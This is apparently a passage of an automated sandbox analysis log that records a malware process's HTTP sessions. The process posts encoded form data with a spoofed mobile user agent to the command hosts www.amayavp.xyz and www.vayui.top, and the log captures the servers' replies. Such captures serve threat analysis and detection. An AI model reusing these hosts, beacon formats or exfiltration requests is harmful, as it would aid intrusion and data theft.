                                                                  Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 9a d0 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 0d c1 3c 0e 1a 42 dc d6 79 d5 6e fa f7 6d af da 71 8c 42 ac 23 22 6b ff d9 fe be 84 39 6c 40 88 e2 8b 4b 09 34 88 88 5c 76 d9 1b 12 fa 5f 6f cf 68 80 fe 03 b6 a5 10 d6 28 9f 2b 43 08 f5 5c c9 d2 49 26 0a e5 ad 50 b9 e5 10 61 6b f3 5a 95 8c 73 47 43 08 a5 74 4c 29 5e aa 5c 28 2a 4a 61 b9 6a 97 f9 00 b9 c7 4c 48 27 7c 49 8c 27 92 52 45 0a c7 4d e1 49 e0 32 e4 8c 95 7c c4 95 9f b8 6d a3 27 80 29 0d 7f 7f 97 61 b1 d4 30 46 1a 22 d8 f9 eb fb 8f d4 07 37 df 4d 97 91 c3 14 1b 6c 11 8a 61 05 22 f3 43 dd ea [TRUNCATED]
                                                                  Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]<BynmqB#"k9l@K4\v_oh(+C\I&PakZsGCtL)^\(*JajLH'|I'REMI2|m')a0F"7Mla"C0`$.a!DC@Vupv&R8@^G3F%-7(-`2oJF(SJ3J30


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.449847185.27.134.144804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:40.440781116 CET768OUTPOST /d9ku/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.amayavp.xyz
                                                                  Origin: http://www.amayavp.xyz
                                                                  Referer: http://www.amayavp.xyz/d9ku/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 30 4a 57 6e 78 4f 50 2f 6d 67 48 69 63 7a 5a 49 73 35 52 58 55 7a 41 67 2f 55 57 37 57 56 4d 2f 67 3d
                                                                  Data Ascii: BTPDLZX=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfG0JWnxOP/mgHiczZIs5RXUzAg/UW7WVM/g=
                                                                  Dec 4, 2024 12:50:41.691081047 CET682INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:41 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                  Cache-Control: no-cache
                                                                  Content-Encoding: br
                                                                  Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 9a d0 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 0d c1 3c 0e 1a 42 dc d6 79 d5 6e fa f7 6d af da 71 8c 42 ac 23 22 6b ff d9 fe be 84 39 6c 40 88 e2 8b 4b 09 34 88 88 5c 76 d9 1b 12 fa 5f 6f cf 68 80 fe 03 b6 a5 10 d6 28 9f 2b 43 08 f5 5c c9 d2 49 26 0a e5 ad 50 b9 e5 10 61 6b f3 5a 95 8c 73 47 43 08 a5 74 4c 29 5e aa 5c 28 2a 4a 61 b9 6a 97 f9 00 b9 c7 4c 48 27 7c 49 8c 27 92 52 45 0a c7 4d e1 49 e0 32 e4 8c 95 7c c4 95 9f b8 6d a3 27 80 29 0d 7f 7f 97 61 b1 d4 30 46 1a 22 d8 f9 eb fb 8f d4 07 37 df 4d 97 91 c3 14 1b 6c 11 8a 61 05 22 f3 43 dd ea [TRUNCATED]
                                                                  Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]<BynmqB#"k9l@K4\v_oh(+C\I&PakZsGCtL)^\(*JajLH'|I'REMI2|m')a0F"7Mla"C0`$.a!DC@Vupv&R8@^G3F%-7(-`2oJF(SJ3J30


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.449853185.27.134.144804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:43.139472008 CET10850OUTPOST /d9ku/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.amayavp.xyz
                                                                  Origin: http://www.amayavp.xyz
                                                                  Referer: http://www.amayavp.xyz/d9ku/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 42 4d 37 36 62 74 2b 6d 4d 71 4e 55 34 36 42 41 5a 66 4c 4e 4b 64 4a 68 45 59 50 59 63 4e 4d 6a 51 4c 64 77 69 2f 50 71 4f 42 4f 36 38 48 69 57 6f 46 4d 64 76 47 2f 58 66 77 37 47 78 4f 4b 4f 6e 4c 34 34 54 66 79 7a 30 4f 32 46 75 46 39 46 49 36 6e 75 58 44 76 57 77 71 4d 68 35 79 2f 67 59 59 75 44 7a 75 76 62 70 4a 65 73 7a 71 39 6e 78 41 6a 58 4c 6e 63 47 53 2f 42 4f 43 67 50 6e 4d 52 50 6d 4e 48 70 4a 31 50 2b 42 72 39 4d 76 69 57 2b 5a 58 77 53 34 45 78 69 43 6f 30 55 46 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzJcnCgYtkOhTXcFHmqVdkJvtP+4NGfsiPgg5eh4jv1Je8nnmJqbBz8I7uCkhmhy7IQnd6lDUlpzEtQ4DQN1kYzn8KbskisOWGqAzLq7nOAGK5EhTOWh+mM2gaZhYnfZnoBM76bt+mMqNU46BAZfLNKdJhEYPYcNMjQLdwi/PqOBO68HiWoFMdvG/Xfw7GxOKOnL44Tfyz0O2FuF9FI6nuXDvWwqMh5y/gYYuDzuvbpJeszq9nxAjXLncGS/BOCgPnMRPmNHpJ1P+Br9MviW+ZXwS4ExiCo0UFPNwPP48sPlu+dvzeUn15+CBR1QA+wa9iF0IT5U4dDXkDFJkmfBSsxLlHz22JcsGGzbSnsn3x9+pVdh5BfDJ21vM3H+NE7EtrQSdFzZe9HvlBbutxYctMjbK7vF9V7cXC2yJ2RhN++/wWGhI1jV1++ffOjlNVSQ7bNWS5KsU4GbIc+LNmCKBo4BJmhGRRSNZdv214r90ZlznQ3hfNOoTochgvnS0W4j1z6Z9zNLU5yVsrtEfkhGD8OhQFxQ2QXYLalktA7sriblklDtxk58y7nhqkorXnJ3f1aKJyJUCV2OBn6Vz1LumyyEhs8TsEXoLlr2XOkAlIGBxnzCQIHKGcEcgVfuB2yb5ghfxIeZx6y9/uy+dB6y/he0lYfRA/gpUG9TcMplzqMFTM0XLDcoTrxTyArLdpYkf/BUS3VSLzcoI1fb3krhEGGlAbRub+1MXcsE0Nu8ghOBBv0UEzVStxE2xt+fIAzJySj69I7kQQPaf7/1tCUls7xbdqM3oQChfttplnIdOTjEQ81TMmhUw6tBTrk9YpKwQ+j4H567vOvQBlSESITyma1IJuP9ufQlGBAlSGx+VjAx9+nhBYiZN7Y4DkwPuDcGPU5jEEQr8m0SWNjUgwaoZ5czRcrEefKcueJ8PP/YnBtblWycXpoX5NsjmLhims7PcTY3 [TRUNCATED]
                                                                  Dec 4, 2024 12:50:44.412031889 CET682INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:44 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                  Cache-Control: no-cache
                                                                  Content-Encoding: br
                                                                  Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 9a d0 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 0d c1 3c 0e 1a 42 dc d6 79 d5 6e fa f7 6d af da 71 8c 42 ac 23 22 6b ff d9 fe be 84 39 6c 40 88 e2 8b 4b 09 34 88 88 5c 76 d9 1b 12 fa 5f 6f cf 68 80 fe 03 b6 a5 10 d6 28 9f 2b 43 08 f5 5c c9 d2 49 26 0a e5 ad 50 b9 e5 10 61 6b f3 5a 95 8c 73 47 43 08 a5 74 4c 29 5e aa 5c 28 2a 4a 61 b9 6a 97 f9 00 b9 c7 4c 48 27 7c 49 8c 27 92 52 45 0a c7 4d e1 49 e0 32 e4 8c 95 7c c4 95 9f b8 6d a3 27 80 29 0d 7f 7f 97 61 b1 d4 30 46 1a 22 d8 f9 eb fb 8f d4 07 37 df 4d 97 91 c3 14 1b 6c 11 8a 61 05 22 f3 43 dd ea [TRUNCATED]
                                                                  Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]<BynmqB#"k9l@K4\v_oh(+C\I&PakZsGCtL)^\(*JajLH'|I'REMI2|m')a0F"7Mla"C0`$.a!DC@Vupv&R8@^G3F%-7(-`2oJF(SJ3J30


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.449862185.27.134.144804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:45.873195887 CET482OUTGET /d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.amayavp.xyz
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:50:47.033354044 CET1173INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:46 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 972
                                                                  Connection: close
                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("356c5d81ad1622917c4a7d1e46e03384");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.449879104.21.95.160804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:52.529640913 CET742OUTPOST /vg0z/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.vayui.top
                                                                  Origin: http://www.vayui.top
                                                                  Referer: http://www.vayui.top/vg0z/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 56 6b 6a 2b 50 4b 32 70 67 42 52 41 33 75 48 5a 2f 31 55 45 4d 5a 67 72 61 6b 4e 45 61 77 66 30 7a 67 3d 3d
                                                                  Data Ascii: BTPDLZX=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDVkj+PK2pgBRA3uHZ/1UEMZgrakNEawf0zg==
                                                                  Dec 4, 2024 12:50:54.112263918 CET910INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:50:53 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnGooNiaR4%2FuFTm2O4Sm6jt2AkaVja2pFOJUbf3%2FwjQfPpmP%2Fyr76jgBmlLcCWtXYzVYWqIAIX5vITbrQgjG4kkP855rgiZI7sH%2FCQcn0MFLuLMWmC%2BbvxWWI4QDBqRn"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb94d84ee66a5c-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.449885104.21.95.160804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:55.186243057 CET762OUTPOST /vg0z/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.vayui.top
                                                                  Origin: http://www.vayui.top
                                                                  Referer: http://www.vayui.top/vg0z/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 6d 30 51 6d 62 38 59 46 6a 58 31 53 72 30 6b 72 50 59 4f 6a 70 50 6e 57 59 38 7a 58 49 4b 39 35 4e 7a 37 30 4e 5a 30 6e 64 6c 53 4b 43 45 73 62 34 63 62 44 59 70 73 69 4f 37 55 6b 4b 74 56 70 4b 62 46 49 44 55 65 66 61 2b 77 41 59 47 69 52 4f 6c 2f 70 41 6b 5a 75 78 5a 66 4b 42 6e 45 62 69 76 37 61 63 51 2b 64 33 5a 65 4c 4a 35 35 53 44 39 44 55 30 6d 62 32 43 65 43 38 36 38 76 79 6c 73 37 49 4b 44 75 45 31 54 65 5a 45 59 48 6a 45 77 58 7a 69 39 6f 6f 39 47 62 2f 52 30 70 65 5a 58 6c 32 6f 64 35 68 51 78 6c 63 41 3d
                                                                  Data Ascii: BTPDLZX=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZEYHjEwXzi9oo9Gb/R0peZXl2od5hQxlcA=
                                                                  Dec 4, 2024 12:50:56.412210941 CET908INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:50:56 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KCCU1hvuO5Ucax93Js2%2BHfNo578ShphpbdSlojgMcS04yQHd1VEkvptP3ECS6DahU4csB6chnMc%2B4i2IHv1jUgxbvfbBqAW5s%2BF8WjoCLRYfzDuZ%2BdM1b6zsXgrP4rCw"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb94e8a9697295-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.449891104.21.95.160804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:57.844650030 CET10844OUTPOST /vg0z/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.vayui.top
                                                                  Origin: http://www.vayui.top
                                                                  Referer: http://www.vayui.top/vg0z/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 75 30 51 56 54 38 59 6e 4c 58 6e 43 72 30 74 4c 50 62 4f 6a 6f 50 6e 57 77 34 7a 58 55 38 39 37 46 7a 70 48 46 5a 6a 6b 46 6c 62 4b 43 45 6b 37 34 5a 56 6a 5a 74 73 69 65 2f 55 67 75 74 56 70 4b 62 46 4b 4c 55 4a 65 61 2b 79 41 59 48 6a 52 4f 78 75 35 41 63 5a 71 6c 4a 66 4b 55 53 59 34 71 76 36 2b 77 51 7a 4f 66 5a 43 62 4a 42 77 43 44 66 44 55 6f 31 62 32 75 73 43 38 6d 57 76 31 4e 73 74 74 6a 5a 31 6e 59 4a 43 49 55 57 45 69 59 68 66 43 71 66 6e 37 74 52 53 65 64 54 31 39 74 41 67 47 4a 35 71 55 59 79 77 4c 62 61 74 31 56 48 36 55 52 64 54 79 56 44 55 34 68 75 71 4c 71 70 41 5a 4f 61 48 4b 49 55 46 39 51 46 2f 68 6d 6f 43 74 74 76 2f 36 42 35 2b 57 43 71 51 2f 4d 31 56 62 79 79 30 64 30 4d 71 6f 2b 69 6c 78 66 44 63 45 6f 66 66 68 46 2f 78 64 31 6f 6c 4f 52 52 33 6d 4c 32 45 46 6c 39 48 6b 39 7a 44 45 